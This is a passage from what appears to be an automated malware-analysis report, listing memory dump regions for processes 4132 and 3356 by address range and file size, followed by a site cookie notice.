    9.6MB

  • memory/3356-47-0x000001488E3B0000-0x000001488E3D2000-memory.dmp

    Filesize

    136KB

  • memory/4132-25-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-8-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-15-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-0-0x00007FF92A335000-0x00007FF92A336000-memory.dmp

    Filesize

    4KB

  • memory/4132-13-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-26-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-30-0x00007FF92A335000-0x00007FF92A336000-memory.dmp

    Filesize

    4KB

  • memory/4132-10-0x000000001FB20000-0x000000001FB82000-memory.dmp

    Filesize

    392KB

  • memory/4132-9-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-14-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-34-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-35-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-37-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-7-0x000000001C870000-0x000000001C8BC000-memory.dmp

    Filesize

    304KB

  • memory/4132-5-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-6-0x00000000015B0000-0x00000000015B8000-memory.dmp

    Filesize

    32KB

  • memory/4132-4-0x000000001C710000-0x000000001C7AC000-memory.dmp

    Filesize

    624KB

  • memory/4132-3-0x000000001C180000-0x000000001C64E000-memory.dmp

    Filesize

    4.8MB

  • memory/4132-2-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-1-0x000000001BC00000-0x000000001BCA6000-memory.dmp

    Filesize

    664KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.